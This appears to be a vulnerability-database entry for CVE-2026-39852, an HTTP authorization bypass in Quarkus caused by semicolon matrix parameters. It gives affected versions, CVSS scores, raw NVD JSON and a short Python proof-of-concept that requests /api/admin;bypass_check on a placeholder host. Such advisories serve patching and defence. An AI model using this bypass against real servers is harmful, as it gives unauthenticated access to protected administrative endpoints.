Security Vulnerability Report
CVE-2026-39852 CVSS 8.2 HIGH

CVE-2026-39852

Published: 2026-05-05 21:16:23
Last Modified: 2026-05-08 17:18:39

Description

Quarkus is a Java framework for building cloud-native applications. In versions prior to 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2, a path normalization inconsistency between the security layer and the routing layer allows unauthenticated or lower-privileged users to bypass HTTP path-based authorization policies. Quarkus's security layer performs authorization checks on the raw URL path which preserves matrix parameters (semicolons), while RESTEasy Reactive's routing layer strips matrix parameters before matching endpoints. An attacker can append a semicolon and arbitrary text to a request URL (e.g., /api/admin;anything) to bypass policies protecting /api/admin while still routing to the protected endpoint. This issue has been fixed in versions 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:* - VULNERABLE (all affected version ranges below share this CPE)
Quarkus < 3.20.6.1
Quarkus < 3.27.3.1
Quarkus < 3.33.1.1
Quarkus < 3.35.1.1
Quarkus < 3.34.7
Quarkus < 3.35.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_poc(target_url):
    # Path to protected endpoint
    protected_path = "/api/admin"
    # Bypass payload: append semicolon and arbitrary text
    bypass_payload = ";bypass_check"
    full_url = f"{target_url}{protected_path}{bypass_payload}"
    print(f"[*] Attempting to access: {full_url}")
    try:
        response = requests.get(full_url)
        if response.status_code == 200:
            print("[+] Authorization bypass successful! Access granted.")
            print(f"[+] Response Content: {response.text[:100]}")
        else:
            print(f"[-] Access denied or error. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target = "http://vulnerable-host:8080"
    exploit_poc(target)
```

References

https://github.com/quarkusio/quarkus/security/advisories/GHSA-rc95-pcm8-65v9 (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-39852", "sourceIdentifier": "[email protected]", "published": "2026-05-05T21:16:22.823", "lastModified": "2026-05-08T17:18:38.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quarkus is a Java framework for building cloud-native applications. In versions prior to 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2, a path normalization inconsistency between the security layer and the routing layer allows unauthenticated or lower-privileged users to bypass HTTP path-based authorization policies. Quarkus's security layer performs authorization checks on the raw URL path which preserves matrix parameters (semicolons), while RESTEasy Reactive's routing layer strips matrix parameters before matching endpoints. An attacker can append a semicolon and arbitrary text to a request URL (e.g., /api/admin;anything) to bypass policies protecting /api/admin while still routing to the protected endpoint. This issue has been fixed in versions 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.20.6.1", "matchCriteriaId": "E5AE56EF-94DF-4552-B4E4-B72B532DE04C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.21.0", "versionEndExcluding": "3.27.3.1", "matchCriteriaId": "DE8ACEA5-1401-493F-A1E5-0D9D87174161"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.28.0", "versionEndExcluding": "3.33.1.1", "matchCriteriaId": "E37E4AF5-6CDF-47E7-998C-C8744296A503"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.34.0", "versionEndExcluding": "3.34.7", "matchCriteriaId": "6179CFEC-6CBF-45D7-9DE5-F47CB1D36F99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.35.0", "versionEndExcluding": "3.35.2", "matchCriteriaId": "4397C81B-D8AF-4DD5-86B4-70CE00462BD3"}]}]}], "references": [{"url": "https://github.com/quarkusio/quarkus/security/advisories/GHSA-rc95-pcm8-65v9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```